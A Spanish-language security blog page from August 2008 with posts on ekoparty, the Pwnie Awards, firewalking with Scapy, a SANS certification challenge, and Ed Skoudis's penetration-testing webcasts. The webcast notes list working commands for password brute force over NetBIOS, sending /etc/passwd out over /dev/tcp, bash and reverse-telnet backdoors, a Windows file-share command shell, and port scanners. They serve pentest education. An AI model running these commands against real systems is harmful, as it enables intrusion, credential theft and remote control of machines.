domingo, 31 de agosto de 2008

ekoparty @ WORK

Se acerca la ekoparty y cinco esclavos trabajan sin descanso para organizar la mejor conferencia latinoamericana de seguridad!

De izquierda a derecha los esclavos son, Juan Pablo Borgna, abajo Federico Kirschbaum, arriba estoy yo, luego el famoso Francisco Amato y finalmente Jeronimo Basaldua. Este año también contamos con la invalorable ayuda de Alexav8, que se fue antes de la foto, y Burbujita.

jueves, 28 de agosto de 2008

Ganadores de los Pwnie Awards 2008

Se publicaron los ganadores 2008 de los Pwnie Awards, el premio a los logros y fallos de la comunidad de seguridad, que fueron presentados en la última edición de la Black Hat.

Uno de los organizadores de los Pwnie Awards, Alexander Sotirov, dará una charla en la ekoparty llamada "Blackbox Reversing of XSS Filters".


martes, 26 de agosto de 2008

Pen Testing Ninjitsu

Hace unos días, Ed Skoudis presento la última parte de 3 webcasts sobre técnicas de PenTest que tituló Pen Testing Ninjitsu I, II y III.

Aquí les dejo algunas notas técnicas que fui tomando, los links para bajarse los webcasts, y de paso me gustaría pedirles dinero para ayudar a este señor :


# Resuelto Recientemente
"ipconfig /displaydns"

# Tabla ARP
"arp -a"

# Recursos Compartidos
"net use \\[targetIP] [password] /u:[user]"
"net use * \\[targetIP]\[share] [password] /u:[user]"
"/u:[MachineName]\[user]"
"net use \\[targetIP] /del"
"net use * /del"

# Ping Sweep
for /L %i in (1,1,255) do @ping -n 1 192.168.1.%i | find "Respuesta"

# DNS Lookups
for /L %i in (1,1,255) do @nslookup 10.10.10.%i 2>nul | find "Name" && echo 10.10.10.%i

# Brute Force con NetBIOS
for /f %i in (users.txt) do @(for /f %j in (pass.txt) do @echo %i:%j & @net use \\10.10.10.10 %j /u:%i 2>nul && echo %i:%j >> success.txt && net use \\10.10.10.10 /del)

# Hola Mundo de Linux a Windows
echo "hola mundo" > /dev/tcp/10.10.10.10/2222
nc -l -p 2222

# Transfiriendo archivos de Linux a Windows
cat /etc/passwd > /dev/tcp/10.10.10.10/2222
nc -l -p 2222

# Backdoor Reverso desde Linux
/bin/bash -i > /dev/tcp/10.10.10.10/2222 0<&1 2>&1
nc -l -p 2222

# Port Scanner desde Linea de Comando en Linux
port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/10.10.10.10/$port; [ $? == 0 ] && echo $port "abierto" >> /tmp/ports.txt; port=`expr $port + 1`; done

# Backdoors usando Telnets Reversos en Linux
telnet 10.10.10.10 2222 | /bin/bash | telnet 10.10.10.10 3333
nc -l -p 2222 (aca se ingresan los comandos)
nc -l -p 3333 (aca sale la respuesta)

# Port Scanner en Windows
for /L %i in (1,1,1024) do telnet 10.10.10.10 %i
(cuando encuentra puerto abierto se cuelga, CTRL-[ y quit)

# Port Scanner en Windows usando el Cliente FTP
for /L %i in (1,1,1024) do echo Checking Port %i: >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.t 2>>ports.txt

# Transferencia de Archivos en Windows
echo hola-mundo > \\10.10.10.10\temp\archivo.txt
type c:\temp\archivo.txt

# Backdoor en Windows usando File Shell
for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1
echo ipconfig > \\10.10.10.10\temp\commands.txt (feed de comandos)
type \\10.10.10.10\temp\output.txt (salida)

Me tome todo este trabajo porque se que después me va a resultar mucho mas fácil venir a buscarlo al blog ;-)

Se pueden bajar los webcasts desde aquí: Parte 1, Parte 2, Parte 3.

jueves, 21 de agosto de 2008

Firewalking 1998-2008

El Firewalking es una interesante técnica creada en 1998 por Goldsmith y Schiffman, con el objetivo de mapear la política de filtrado de un firewall. Diez años después, ¿ todavía funciona esta técnica ?


¿ cómo trabaja el firewalking ?

Básicamente, vamos a realizar un escaneo de puertos con una TTL fija que debe expirar en el último gateway antes de llegar a nuestro objetivo.

Si el paquete expira, recibiremos un mensaje de error ICMP time exceed in-transit, lo que nos estará indicando que el paquete supero la barrera de filtrado pero no llego al objetivo ya que la TTL llego a 0. Si no recibimos ninguna respuesta significa que el paquete fue descartado por el firewall ya que no cumplía con la política de filtrado.

¿ cuál es la diferencia con un escaneo de puertos ?

En un escaneo de puertos solo podemos estar seguros de las respuestas que recibimos, por ejemplo si recibimos un SYN/ACK el puerto esta abierto, o si recibimos un RST el puerto esta cerrado, pero si no recibimos nada, ¿ significa que efectivamente el puerto esta filtrado ? no, también pueden estar pasando muchas otras cosas.

Pero el firewalking se vuelve sumamente efectivo cuando escaneamos puertos UDP o hacemos un escaneo de protocolos, en donde generalmente no vamos a recibir respuestas.

¿ todavía funciona esta técnica ?

Para la época en la que fue concebida esta técnica, los firewalls eran muy básicos por lo que el firewalking era bastante efectivo. La mayoría de los firewalls modernos ya no decrementan la TTL de los paquetes, por lo que el firewalking solo es efectivo si entre nuestro objetivo y el firewall hay un router.

Igualmente, todavía podemos encontrar muchas redes con packet filters o que tienen varias DMZ's con router's en el medio, por lo que la diversión todavía no termino ;-)

A modo de Nota Mental, para hacer un Firewalking con Scapy, primero hay que utilizar traceroute() para obtener la TTL del último gateway, y luego las siguientes funciones para hacer el firewalking y graficar los resultados:



res,unans = sr(IP(dst=TARGET, ttl=GWTTL)/TCP(dport=[PUERTOS]), timeout=2, retry=-2)

res.make_table(lambda (s,r):(s.dst, s.dport, r.sprintf("{TCP:%TCP.flags%}{ICMP:%IP.src%#%r,ICMP.type%}")))

lunes, 18 de agosto de 2008

SANS Desafía a los CEH

Hace unos días, SANS lanzo un desafío para certificados en CEH que deseen probar sus conocimientos frente a GPEN (GIAC Penetration Tester), la nueva certificación de SANS. Me anote y entre al desafío :-)


Realmente me sorprendió tener la posibilidad de participar, ya que el desafío era para los primeros 50 CEH que se registren, y generalmente para este tipo de promociones se anotan cientos de personas.

GPEN es una certificación altamente técnica de Penetration Testing creada por el mítico Ed Skoudis en persona, y el costo para tomar el examen es de 900 USD.

Que solo se haya invitado a certificados en CEH, me hace pensar que el examen es muy difícil y el objetivo podría ser tener una estadística marketinera del tipo "el 90% de los CEH no pudo aprobar esta certificación"...

Los que entramos en el desafío no tenemos que pagar nada, pero tampoco tenemos acceso al curso ni tampoco a cualquier tipo de material de apoyo, la única guía disponible es el temario del curso.

En principio hay tiempo hasta Diciembre para tomar el examen, así que recién voy a comenzar a estudiar después de la ekoparty, vamos a ver como me va... ;-)